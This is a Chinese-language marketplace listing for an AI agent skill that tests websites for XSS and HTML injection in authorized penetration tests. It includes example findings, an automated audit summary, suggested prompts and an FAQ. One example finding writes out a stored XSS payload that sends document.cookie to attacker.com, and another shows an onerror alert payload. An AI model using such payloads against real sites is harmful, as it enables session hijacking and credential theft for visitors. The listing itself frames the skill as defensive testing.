技能 xss-html-injection
📦
xss-html-injection
安全 ⚡
包含脚本⚙️
外部命令🌐
网络访问📁
文件系统访问
测试 XSS 和 HTML 注入漏洞
Web 应用程序通常包含跨站脚本和 HTML 注入缺陷,攻击者可利用这些缺陷窃取会话和凭证。本技能提供了系统化的方法论,用于在授权的安全评估中检测、利用和验证客户端注入漏洞。
支持: Claude Codex Code(CC)
1
下载技能 ZIP
2
在 Claude 中上传
前往 设置 → 功能 → 技能 → 上传技能
3
开启并开始使用
测试它
正在使用“xss-html-injection”。 测试搜索参数的反射型 XSS
预期结果:
- 发现漏洞:/search?q= 参数存在反射型 XSS
- 严重程度:中等
- 载荷:<img src=x onerror=alert(document.domain)>
- 上下文:HTML 主体 - 未编码的反射
- 建议:对所有用户输入实施输出编码
正在使用“xss-html-injection”。 测试用户个人资料简介字段的存储型 XSS
预期结果:
- 发现漏洞:用户个人资料简介存在存储型 XSS
- 严重程度:高(持久性,影响所有用户)
- 载荷:<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
- 影响:所有查看个人资料的用户都会遭会话劫持
- 建议:实施严格的输入验证和输出编码
安全审计
安全v1 • 2/25/2026
This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.
1
已扫描文件
505
分析行数
5
发现项
1
审计总数
低风险问题 (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.
风险因素
⚡ 包含脚本 (7)
⚙️ 外部命令 (64)
SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498
🌐 网络访问 (27)
SKILL.md:136 SKILL.md:382 SKILL.md:124 SKILL.md:130 SKILL.md:136 SKILL.md:145 SKILL.md:160 SKILL.md:163 SKILL.md:166 SKILL.md:169 SKILL.md:223 SKILL.md:226 SKILL.md:230 SKILL.md:246 SKILL.md:253 SKILL.md:254 SKILL.md:258 SKILL.md:375 SKILL.md:382 SKILL.md:434 SKILL.md:446 SKILL.md:451 SKILL.md:456 SKILL.md:456 SKILL.md:472 SKILL.md:483 SKILL.md:488
📁 文件系统访问 (1)
检测到的模式
Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
审计者: claude
质量评分
38
架构
100
可维护性
87
内容
50
社区
100
安全
87
规范符合性
你能构建什么
安全顾问测试 Web 应用程序
进行授权渗透测试,识别客户 Web 应用程序中的 XSS 漏洞并提供修复建议。
开发人员验证输入处理
在开发过程中测试自定义 Web 应用程序,验证是否正确实施了输入清理和输出编码。
QA 工程师执行安全回归测试
在安全回归测试套件中包含 XSS 和 HTML 注入测试,以便在生产部署前发现漏洞。
试试这些提示
基本 XSS 检测
使用 XSS HTML 注入技能测试 https://example.com 的登录表单是否存在反射型 XSS 漏洞。识别所有输入字段并测试基本 XSS 载荷。
存储型 XSS 评估
使用 XSS HTML 注入技能测试评论区的存储型 XSS。创建持久化并在其他用户查看内容时执行的测试载荷。
基于 DOM 的 XSS 发现
使用 XSS HTML 注入技能分析 https://example.com/dashboard 的 JavaScript 代码以查找基于 DOM 的 XSS。检查 location.hash 和 location.search 的处理方式。
过滤器绕过验证
使用 XSS HTML 注入技能测试 https://example.com 的 WAF 是否阻止常见的 XSS 载荷。尝试 HTML 编码、Unicode 编码和标签变体绕过技术。
最佳实践
- 测试任何目标应用程序前务必获取书面授权
- 使用受控的演示载荷,不会持久化或传播到非目标用户
- 通过适当的事件响应渠道立即报告严重漏洞
避免
- 未经明确书面授权测试生产系统
- 将发现的漏洞用于未授权的访问或数据泄露
- 部署可能导致拒绝服务或系统损坏的载荷
常见问题
本技能是否会对目标网站执行实际攻击?
否。本技能提供授权安全测试的方法论和载荷。用户在测试任何系统前必须获得明确的书面许可。
本技能能否测试所有类型的 XSS?
本技能涵盖存储型、反射型和基于 DOM 的 XSS。然而,某些高级变体(如突变 XSS)可能需要额外的专业技术。
使用本技能前需要什么授权?
需要系统所有者的书面授权。这应包括定义的范围、允许的测试方法以及对任何捕获数据的处理程序。
本技能能否对具有 CSP 的应用程序生效?
CSP 可以阻止许多 XSS 载荷。本技能包含 CSP 绕过测试技术,但某些配置良好的 CSP 策略可能会阻止成功利用。
会话 cookie 是否总能通过 XSS 窃取?
否。标记为 HttpOnly 的 Cookie 无法通过 JavaScript 访问。现代应用程序应该为会话 cookie 使用此保护措施。
如果我发现了严重的 XSS 漏洞应该怎么做?
根据您的授权协议,通过适当渠道立即报告。记录发现并提供概念验证,向所有者提供修复建议。